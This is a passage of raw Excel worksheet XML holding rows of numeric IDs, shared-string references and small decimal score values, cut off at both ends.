      <c r="C7628" s="2" t="s">
        <v>7237</v>
      </c>
      <c r="D7628" s="2">
        <v>1.0</v>
      </c>
      <c r="E7628" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7628" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7629" ht="15.75" customHeight="1">
      <c r="A7629" s="1">
        <v>27528.0</v>
      </c>
      <c r="B7629" s="2">
        <v>2.2192969E7</v>
      </c>
      <c r="C7629" s="2" t="s">
        <v>7238</v>
      </c>
      <c r="D7629" s="2">
        <v>1.0</v>
      </c>
      <c r="E7629" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7629" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7630" ht="15.75" customHeight="1">
      <c r="A7630" s="1">
        <v>27709.0</v>
      </c>
      <c r="B7630" s="2">
        <v>2.3043535E7</v>
      </c>
      <c r="C7630" s="2" t="s">
        <v>7239</v>
      </c>
      <c r="D7630" s="2">
        <v>1.0</v>
      </c>
      <c r="E7630" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7630" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7631" ht="15.75" customHeight="1">
      <c r="A7631" s="1">
        <v>27802.0</v>
      </c>
      <c r="B7631" s="2">
        <v>2.322048E7</v>
      </c>
      <c r="C7631" s="2" t="s">
        <v>7240</v>
      </c>
      <c r="D7631" s="2">
        <v>1.0</v>
      </c>
      <c r="E7631" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7631" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7632" ht="15.75" customHeight="1">
      <c r="A7632" s="1">
        <v>28348.0</v>
      </c>
      <c r="B7632" s="2">
        <v>2.593097E7</v>
      </c>
      <c r="C7632" s="2" t="s">
        <v>7241</v>
      </c>
      <c r="D7632" s="2">
        <v>1.0</v>
      </c>
      <c r="E7632" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7632" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7633" ht="15.75" customHeight="1">
      <c r="A7633" s="1">
        <v>28370.0</v>
      </c>
      <c r="B7633" s="2">
        <v>2.6042846E7</v>
      </c>
      <c r="C7633" s="2" t="s">
        <v>7242</v>
      </c>
      <c r="D7633" s="2">
        <v>1.0</v>
      </c>
      <c r="E7633" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7633" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7634" ht="15.75" customHeight="1">
      <c r="A7634" s="1">
        <v>28806.0</v>
      </c>
      <c r="B7634" s="2">
        <v>2.8660022E7</v>
      </c>
      <c r="C7634" s="2" t="s">
        <v>7243</v>
      </c>
      <c r="D7634" s="2">
        <v>1.0</v>
      </c>
      <c r="E7634" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7634" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7635" ht="15.75" customHeight="1">
      <c r="A7635" s="1">
        <v>29085.0</v>
      </c>
      <c r="B7635" s="2">
        <v>3.0363033E7</v>
      </c>
      <c r="C7635" s="2" t="s">
        <v>7244</v>
      </c>
      <c r="D7635" s="2">
        <v>1.0</v>
      </c>
      <c r="E7635" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7635" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7636" ht="15.75" customHeight="1">
      <c r="A7636" s="1">
        <v>29526.0</v>
      </c>
      <c r="B7636" s="2">
        <v>3.2797312E7</v>
      </c>
      <c r="C7636" s="2" t="s">
        <v>7245</v>
      </c>
      <c r="D7636" s="2">
        <v>1.0</v>
      </c>
      <c r="E7636" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7636" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7637" ht="15.75" customHeight="1">
      <c r="A7637" s="1">
        <v>29705.0</v>
      </c>
      <c r="B7637" s="2">
        <v>3.4377877E7</v>
      </c>
      <c r="C7637" s="2" t="s">
        <v>7246</v>
      </c>
      <c r="D7637" s="2">
        <v>1.0</v>
      </c>
      <c r="E7637" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7637" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7638" ht="15.75" customHeight="1">
      <c r="A7638" s="1">
        <v>29898.0</v>
      </c>
      <c r="B7638" s="2">
        <v>3607018.0</v>
      </c>
      <c r="C7638" s="2" t="s">
        <v>7247</v>
      </c>
      <c r="D7638" s="2">
        <v>1.0</v>
      </c>
      <c r="E7638" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7638" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7639" ht="15.75" customHeight="1">
      <c r="A7639" s="1">
        <v>29973.0</v>
      </c>
      <c r="B7639" s="2">
        <v>3609619.0</v>
      </c>
      <c r="C7639" s="2" t="s">
        <v>7248</v>
      </c>
      <c r="D7639" s="2">
        <v>1.0</v>
      </c>
      <c r="E7639" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7639" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7640" ht="15.75" customHeight="1">
      <c r="A7640" s="1">
        <v>29975.0</v>
      </c>
      <c r="B7640" s="2">
        <v>3609619.0</v>
      </c>
      <c r="C7640" s="2" t="s">
        <v>7249</v>
      </c>
      <c r="D7640" s="2">
        <v>1.0</v>
      </c>
      <c r="E7640" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7640" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7641" ht="15.75" customHeight="1">
      <c r="A7641" s="1">
        <v>30139.0</v>
      </c>
      <c r="B7641" s="2">
        <v>3.7042415E7</v>
      </c>
      <c r="C7641" s="2" t="s">
        <v>7250</v>
      </c>
      <c r="D7641" s="2">
        <v>1.0</v>
      </c>
      <c r="E7641" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7641" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7642" ht="15.75" customHeight="1">
      <c r="A7642" s="1">
        <v>30162.0</v>
      </c>
      <c r="B7642" s="2">
        <v>3.704579E7</v>
      </c>
      <c r="C7642" s="2" t="s">
        <v>7251</v>
      </c>
      <c r="D7642" s="2">
        <v>1.0</v>
      </c>
      <c r="E7642" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7642" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7643" ht="15.75" customHeight="1">
      <c r="A7643" s="1">
        <v>30662.0</v>
      </c>
      <c r="B7643" s="2">
        <v>4.2153344E7</v>
      </c>
      <c r="C7643" s="2" t="s">
        <v>7252</v>
      </c>
      <c r="D7643" s="2">
        <v>1.0</v>
      </c>
      <c r="E7643" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7643" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7644" ht="15.75" customHeight="1">
      <c r="A7644" s="1">
        <v>30965.0</v>
      </c>
      <c r="B7644" s="2">
        <v>4.746232E7</v>
      </c>
      <c r="C7644" s="2" t="s">
        <v>7253</v>
      </c>
      <c r="D7644" s="2">
        <v>1.0</v>
      </c>
      <c r="E7644" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7644" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7645" ht="15.75" customHeight="1">
      <c r="A7645" s="1">
        <v>31171.0</v>
      </c>
      <c r="B7645" s="2">
        <v>4908182.0</v>
      </c>
      <c r="C7645" s="2" t="s">
        <v>7254</v>
      </c>
      <c r="D7645" s="2">
        <v>1.0</v>
      </c>
      <c r="E7645" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7645" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7646" ht="15.75" customHeight="1">
      <c r="A7646" s="1">
        <v>31652.0</v>
      </c>
      <c r="B7646" s="2">
        <v>5.1603108E7</v>
      </c>
      <c r="C7646" s="2" t="s">
        <v>7255</v>
      </c>
      <c r="D7646" s="2">
        <v>1.0</v>
      </c>
      <c r="E7646" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7646" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7647" ht="15.75" customHeight="1">
      <c r="A7647" s="1">
        <v>31923.0</v>
      </c>
      <c r="B7647" s="2">
        <v>5304694.0</v>
      </c>
      <c r="C7647" s="2" t="s">
        <v>7256</v>
      </c>
      <c r="D7647" s="2">
        <v>1.0</v>
      </c>
      <c r="E7647" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7647" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7648" ht="15.75" customHeight="1">
      <c r="A7648" s="1">
        <v>32329.0</v>
      </c>
      <c r="B7648" s="2">
        <v>5.5783429E7</v>
      </c>
      <c r="C7648" s="2" t="s">
        <v>7257</v>
      </c>
      <c r="D7648" s="2">
        <v>1.0</v>
      </c>
      <c r="E7648" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7648" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7649" ht="15.75" customHeight="1">
      <c r="A7649" s="1">
        <v>32414.0</v>
      </c>
      <c r="B7649" s="2">
        <v>5641239.0</v>
      </c>
      <c r="C7649" s="2" t="s">
        <v>7258</v>
      </c>
      <c r="D7649" s="2">
        <v>1.0</v>
      </c>
      <c r="E7649" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7649" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7650" ht="15.75" customHeight="1">
      <c r="A7650" s="1">
        <v>33368.0</v>
      </c>
      <c r="B7650" s="2">
        <v>7632037.0</v>
      </c>
      <c r="C7650" s="2" t="s">
        <v>7259</v>
      </c>
      <c r="D7650" s="2">
        <v>1.0</v>
      </c>
      <c r="E7650" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7650" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7651" ht="15.75" customHeight="1">
      <c r="A7651" s="1">
        <v>33760.0</v>
      </c>
      <c r="B7651" s="2">
        <v>8610490.0</v>
      </c>
      <c r="C7651" s="2" t="s">
        <v>7260</v>
      </c>
      <c r="D7651" s="2">
        <v>1.0</v>
      </c>
      <c r="E7651" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7651" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7652" ht="15.75" customHeight="1">
      <c r="A7652" s="1">
        <v>33881.0</v>
      </c>
      <c r="B7652" s="2">
        <v>9122939.0</v>
      </c>
      <c r="C7652" s="2" t="s">
        <v>7261</v>
      </c>
      <c r="D7652" s="2">
        <v>1.0</v>
      </c>
      <c r="E7652" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7652" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7653" ht="15.75" customHeight="1">
      <c r="A7653" s="1">
        <v>34014.0</v>
      </c>
      <c r="B7653" s="2">
        <v>9512074.0</v>
      </c>
      <c r="C7653" s="2" t="s">
        <v>7262</v>
      </c>
      <c r="D7653" s="2">
        <v>1.0</v>
      </c>
      <c r="E7653" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7653" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7654" ht="15.75" customHeight="1">
      <c r="A7654" s="1">
        <v>22064.0</v>
      </c>
      <c r="B7654" s="2">
        <v>3.0543942E7</v>
      </c>
      <c r="C7654" s="2" t="s">
        <v>7263</v>
      </c>
      <c r="D7654" s="2">
        <v>1.0</v>
      </c>
      <c r="E7654" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7654" s="2">
        <v>0.09748427672955974</v>
      </c>
    </row>
    <row r="7655" ht="15.75" customHeight="1">
      <c r="A7655" s="1">
        <v>30299.0</v>
      </c>
      <c r="B7655" s="2">
        <v>3786691.0</v>
      </c>
      <c r="C7655" s="2" t="s">
        <v>7264</v>
      </c>
      <c r="D7655" s="2">
        <v>1.0</v>
      </c>
      <c r="E7655" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7655" s="2">
        <v>0.09748427672955974</v>
      </c>
    </row>
    <row r="7656" ht="15.75" customHeight="1">
      <c r="A7656" s="1">
        <v>33074.0</v>
      </c>
      <c r="B7656" s="2">
        <v>6876856.0</v>
      </c>
      <c r="C7656" s="2" t="s">
        <v>7265</v>
      </c>
      <c r="D7656" s="2">
        <v>1.0</v>
      </c>
      <c r="E7656" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7656" s="2">
        <v>0.09748427672955974</v>
      </c>
    </row>
    <row r="7657" ht="15.75" customHeight="1">
      <c r="A7657" s="1">
        <v>7420.0</v>
      </c>
      <c r="B7657" s="2">
        <v>5.1150014E7</v>
      </c>
      <c r="C7657" s="2" t="s">
        <v>7266</v>
      </c>
      <c r="D7657" s="2">
        <v>1.0</v>
      </c>
      <c r="E7657" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7657" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="7658" ht="15.75" customHeight="1">
      <c r="A7658" s="1">
        <v>9914.0</v>
      </c>
      <c r="B7658" s="2">
        <v>5.680036E7</v>
      </c>
      <c r="C7658" s="2" t="s">
        <v>7267</v>
      </c>
      <c r="D7658" s="2">
        <v>1.0</v>
      </c>
      <c r="E7658" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7658" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="7659" ht="15.75" customHeight="1">
      <c r="A7659" s="1">
        <v>23401.0</v>
      </c>
      <c r="B7659" s="2">
        <v>5.5822958E7</v>
      </c>
      <c r="C7659" s="2" t="s">
        <v>7139</v>
      </c>
      <c r="D7659" s="2">
        <v>1.0</v>
      </c>
      <c r="E7659" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7659" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="7660" ht="15.75" customHeight="1">
      <c r="A7660" s="1">
        <v>27603.0</v>
      </c>
      <c r="B7660" s="2">
        <v>2.2627947E7</v>
      </c>
      <c r="C7660" s="2" t="s">
        <v>7268</v>
      </c>
      <c r="D7660" s="2">
        <v>1.0</v>
      </c>
      <c r="E7660" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7660" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="7661" ht="15.75" customHeight="1">
      <c r="A7661" s="1">
        <v>34086.0</v>
      </c>
      <c r="B7661" s="2">
        <v>9680062.0</v>
      </c>
      <c r="C7661" s="2" t="s">
        <v>7269</v>
      </c>
      <c r="D7661" s="2">
        <v>1.0</v>
      </c>
      <c r="E7661" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7661" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="7662" ht="15.75" customHeight="1">
      <c r="A7662" s="1">
        <v>21494.0</v>
      </c>
      <c r="B7662" s="2">
        <v>2.3080021E7</v>
      </c>
      <c r="C7662" s="2" t="s">
        <v>7270</v>
      </c>
      <c r="D7662" s="2">
        <v>1.0</v>
      </c>
      <c r="E7662" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7662" s="2">
        <v>0.0972222222222222</v>
      </c>
    </row>
    <row r="7663" ht="15.75" customHeight="1">
      <c r="A7663" s="1">
        <v>24048.0</v>
      </c>
      <c r="B7663" s="2">
        <v>9545898.0</v>
      </c>
      <c r="C7663" s="2" t="s">
        <v>7271</v>
      </c>
      <c r="D7663" s="2">
        <v>1.0</v>
      </c>
      <c r="E7663" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7663" s="2">
        <v>0.09698681732580036</v>
      </c>
    </row>
    <row r="7664" ht="15.75" customHeight="1">
      <c r="A7664" s="1">
        <v>4910.0</v>
      </c>
      <c r="B7664" s="2">
        <v>4.3921211E7</v>
      </c>
      <c r="C7664" s="2" t="s">
        <v>7272</v>
      </c>
      <c r="D7664" s="2">
        <v>1.0</v>
      </c>
      <c r="E7664" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7664" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="7665" ht="15.75" customHeight="1">
      <c r="A7665" s="1">
        <v>15589.0</v>
      </c>
      <c r="B7665" s="2">
        <v>4.3448897E7</v>
      </c>
      <c r="C7665" s="2" t="s">
        <v>7273</v>
      </c>
      <c r="D7665" s="2">
        <v>1.0</v>
      </c>
      <c r="E7665" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7665" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="7666" ht="15.75" customHeight="1">
      <c r="A7666" s="1">
        <v>18224.0</v>
      </c>
      <c r="B7666" s="2">
        <v>5.2106152E7</v>
      </c>
      <c r="C7666" s="2" t="s">
        <v>7274</v>
      </c>
      <c r="D7666" s="2">
        <v>1.0</v>
      </c>
      <c r="E7666" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7666" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="7667" ht="15.75" customHeight="1">
      <c r="A7667" s="1">
        <v>19165.0</v>
      </c>
      <c r="B7667" s="2">
        <v>5.4928509E7</v>
      </c>
      <c r="C7667" s="2" t="s">
        <v>7275</v>
      </c>
      <c r="D7667" s="2">
        <v>1.0</v>
      </c>
      <c r="E7667" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7667" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="7668" ht="15.75" customHeight="1">
      <c r="A7668" s="1">
        <v>25120.0</v>
      </c>
      <c r="B7668" s="2">
        <v>1.2972286E7</v>
      </c>
      <c r="C7668" s="2" t="s">
        <v>7276</v>
      </c>
      <c r="D7668" s="2">
        <v>1.0</v>
      </c>
      <c r="E7668" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7668" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="7669" ht="15.75" customHeight="1">
      <c r="A7669" s="1">
        <v>34084.0</v>
      </c>
      <c r="B7669" s="2">
        <v>9680062.0</v>
      </c>
      <c r="C7669" s="2" t="s">
        <v>7277</v>
      </c>
      <c r="D7669" s="2">
        <v>1.0</v>
      </c>
      <c r="E7669" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7669" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="7670" ht="15.75" customHeight="1">
      <c r="A7670" s="1">
        <v>7078.0</v>
      </c>
      <c r="B7670" s="2">
        <v>5.0261767E7</v>
      </c>
      <c r="C7670" s="2" t="s">
        <v>7278</v>
      </c>
      <c r="D7670" s="2">
        <v>1.0</v>
      </c>
      <c r="E7670" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7670" s="2">
        <v>0.09649122807017543</v>
      </c>
    </row>
    <row r="7671" ht="15.75" customHeight="1">
      <c r="A7671" s="1">
        <v>18063.0</v>
      </c>
      <c r="B7671" s="2">
        <v>5.1602586E7</v>
      </c>
      <c r="C7671" s="2" t="s">
        <v>7279</v>
      </c>
      <c r="D7671" s="2">
        <v>1.0</v>
      </c>
      <c r="E7671" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7671" s="2">
        <v>0.09623015873015874</v>
      </c>
    </row>
    <row r="7672" ht="15.75" customHeight="1">
      <c r="A7672" s="1">
        <v>18627.0</v>
      </c>
      <c r="B7672" s="2">
        <v>5.3377381E7</v>
      </c>
      <c r="C7672" s="2" t="s">
        <v>7280</v>
      </c>
      <c r="D7672" s="2">
        <v>1.0</v>
      </c>
      <c r="E7672" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7672" s="2">
        <v>0.09623015873015874</v>
      </c>
    </row>
    <row r="7673" ht="15.75" customHeight="1">
      <c r="A7673" s="1">
        <v>22012.0</v>
      </c>
      <c r="B7673" s="2">
        <v>2.9868708E7</v>
      </c>
      <c r="C7673" s="2" t="s">
        <v>7281</v>
      </c>
      <c r="D7673" s="2">
        <v>1.0</v>
      </c>
      <c r="E7673" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7673" s="2">
        <v>0.09623015873015874</v>
      </c>
    </row>
    <row r="7674" ht="15.75" customHeight="1">
      <c r="A7674" s="1">
        <v>32430.0</v>
      </c>
      <c r="B7674" s="2">
        <v>5.6549812E7</v>
      </c>
      <c r="C7674" s="2" t="s">
        <v>7282</v>
      </c>
      <c r="D7674" s="2">
        <v>1.0</v>
      </c>
      <c r="E7674" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7674" s="2">
        <v>0.09623015873015872</v>
      </c>
    </row>
    <row r="7675" ht="15.75" customHeight="1">
      <c r="A7675" s="1">
        <v>21701.0</v>
      </c>
      <c r="B7675" s="2">
        <v>2.5256133E7</v>
      </c>
      <c r="C7675" s="2" t="s">
        <v>7283</v>
      </c>
      <c r="D7675" s="2">
        <v>1.0</v>
      </c>
      <c r="E7675" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7675" s="2">
        <v>0.09595959595959597</v>
      </c>
    </row>
    <row r="7676" ht="15.75" customHeight="1">
      <c r="A7676" s="1">
        <v>1011.0</v>
      </c>
      <c r="B7676" s="2">
        <v>2.3084577E7</v>
      </c>
      <c r="C7676" s="2" t="s">
        <v>7284</v>
      </c>
      <c r="D7676" s="2">
        <v>1.0</v>
      </c>
      <c r="E7676" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7676" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="7677" ht="15.75" customHeight="1">
      <c r="A7677" s="1">
        <v>17424.0</v>
      </c>
      <c r="B7677" s="2">
        <v>4.9711239E7</v>
      </c>
      <c r="C7677" s="2" t="s">
        <v>7285</v>
      </c>
      <c r="D7677" s="2">
        <v>1.0</v>
      </c>
      <c r="E7677" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7677" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="7678" ht="15.75" customHeight="1">
      <c r="A7678" s="1">
        <v>23039.0</v>
      </c>
      <c r="B7678" s="2">
        <v>5.0134748E7</v>
      </c>
      <c r="C7678" s="2" t="s">
        <v>7286</v>
      </c>
      <c r="D7678" s="2">
        <v>1.0</v>
      </c>
      <c r="E7678" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7678" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="7679" ht="15.75" customHeight="1">
      <c r="A7679" s="1">
        <v>30121.0</v>
      </c>
      <c r="B7679" s="2">
        <v>3.6889936E7</v>
      </c>
      <c r="C7679" s="2" t="s">
        <v>7287</v>
      </c>
      <c r="D7679" s="2">
        <v>1.0</v>
      </c>
      <c r="E7679" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7679" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="7680" ht="15.75" customHeight="1">
      <c r="A7680" s="1">
        <v>9551.0</v>
      </c>
      <c r="B7680" s="2">
        <v>5.6033067E7</v>
      </c>
      <c r="C7680" s="2" t="s">
        <v>7288</v>
      </c>
      <c r="D7680" s="2">
        <v>1.0</v>
      </c>
      <c r="E7680" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7680" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="7681" ht="15.75" customHeight="1">
      <c r="A7681" s="1">
        <v>15278.0</v>
      </c>
      <c r="B7681" s="2">
        <v>4.2400168E7</v>
      </c>
      <c r="C7681" s="2" t="s">
        <v>7289</v>
      </c>
      <c r="D7681" s="2">
        <v>1.0</v>
      </c>
      <c r="E7681" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7681" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="7682" ht="15.75" customHeight="1">
      <c r="A7682" s="1">
        <v>24250.0</v>
      </c>
      <c r="B7682" s="2">
        <v>1.0504958E7</v>
      </c>
      <c r="C7682" s="2" t="s">
        <v>7290</v>
      </c>
      <c r="D7682" s="2">
        <v>1.0</v>
      </c>
      <c r="E7682" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7682" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="7683" ht="15.75" customHeight="1">
      <c r="A7683" s="1">
        <v>826.0</v>
      </c>
      <c r="B7683" s="2">
        <v>2.1538744E7</v>
      </c>
      <c r="C7683" s="2" t="s">
        <v>7291</v>
      </c>
      <c r="D7683" s="2">
        <v>1.0</v>
      </c>
      <c r="E7683" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7683" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7684" ht="15.75" customHeight="1">
      <c r="A7684" s="1">
        <v>1238.0</v>
      </c>
      <c r="B7684" s="2">
        <v>2.5084907E7</v>
      </c>
      <c r="C7684" s="2" t="s">
        <v>7292</v>
      </c>
      <c r="D7684" s="2">
        <v>1.0</v>
      </c>
      <c r="E7684" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7684" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7685" ht="15.75" customHeight="1">
      <c r="A7685" s="1">
        <v>1451.0</v>
      </c>
      <c r="B7685" s="2">
        <v>2.6833193E7</v>
      </c>
      <c r="C7685" s="2" t="s">
        <v>7293</v>
      </c>
      <c r="D7685" s="2">
        <v>1.0</v>
      </c>
      <c r="E7685" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7685" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7686" ht="15.75" customHeight="1">
      <c r="A7686" s="1">
        <v>2121.0</v>
      </c>
      <c r="B7686" s="2">
        <v>3.1386668E7</v>
      </c>
      <c r="C7686" s="2" t="s">
        <v>7294</v>
      </c>
      <c r="D7686" s="2">
        <v>1.0</v>
      </c>
      <c r="E7686" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7686" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7687" ht="15.75" customHeight="1">
      <c r="A7687" s="1">
        <v>6215.0</v>
      </c>
      <c r="B7687" s="2">
        <v>4.8009701E7</v>
      </c>
      <c r="C7687" s="2" t="s">
        <v>7295</v>
      </c>
      <c r="D7687" s="2">
        <v>1.0</v>
      </c>
      <c r="E7687" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7687" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7688" ht="15.75" customHeight="1">
      <c r="A7688" s="1">
        <v>7217.0</v>
      </c>
      <c r="B7688" s="2">
        <v>5.0630604E7</v>
      </c>
      <c r="C7688" s="2" t="s">
        <v>7296</v>
      </c>
      <c r="D7688" s="2">
        <v>1.0</v>
      </c>
      <c r="E7688" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7688" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7689" ht="15.75" customHeight="1">
      <c r="A7689" s="1">
        <v>10682.0</v>
      </c>
      <c r="B7689" s="2">
        <v>1.4667967E7</v>
      </c>
      <c r="C7689" s="2" t="s">
        <v>7297</v>
      </c>
      <c r="D7689" s="2">
        <v>1.0</v>
      </c>
      <c r="E7689" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7689" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7690" ht="15.75" customHeight="1">
      <c r="A7690" s="1">
        <v>12356.0</v>
      </c>
      <c r="B7690" s="2">
        <v>2.8692584E7</v>
      </c>
      <c r="C7690" s="2" t="s">
        <v>7298</v>
      </c>
      <c r="D7690" s="2">
        <v>1.0</v>
      </c>
      <c r="E7690" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7690" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7691" ht="15.75" customHeight="1">
      <c r="A7691" s="1">
        <v>13063.0</v>
      </c>
      <c r="B7691" s="2">
        <v>3.3288302E7</v>
      </c>
      <c r="C7691" s="2" t="s">
        <v>7299</v>
      </c>
      <c r="D7691" s="2">
        <v>1.0</v>
      </c>
      <c r="E7691" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7691" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7692" ht="15.75" customHeight="1">
      <c r="A7692" s="1">
        <v>13783.0</v>
      </c>
      <c r="B7692" s="2">
        <v>3.6560484E7</v>
      </c>
      <c r="C7692" s="2" t="s">
        <v>7300</v>
      </c>
      <c r="D7692" s="2">
        <v>1.0</v>
      </c>
      <c r="E7692" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7692" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7693" ht="15.75" customHeight="1">
      <c r="A7693" s="1">
        <v>13988.0</v>
      </c>
      <c r="B7693" s="2">
        <v>3.7375979E7</v>
      </c>
      <c r="C7693" s="2" t="s">
        <v>7301</v>
      </c>
      <c r="D7693" s="2">
        <v>1.0</v>
      </c>
      <c r="E7693" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7693" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7694" ht="15.75" customHeight="1">
      <c r="A7694" s="1">
        <v>14213.0</v>
      </c>
      <c r="B7694" s="2">
        <v>3.8271604E7</v>
      </c>
      <c r="C7694" s="2" t="s">
        <v>7302</v>
      </c>
      <c r="D7694" s="2">
        <v>1.0</v>
      </c>
      <c r="E7694" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7694" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7695" ht="15.75" customHeight="1">
      <c r="A7695" s="1">
        <v>14971.0</v>
      </c>
      <c r="B7695" s="2">
        <v>4.1356928E7</v>
      </c>
      <c r="C7695" s="2" t="s">
        <v>7303</v>
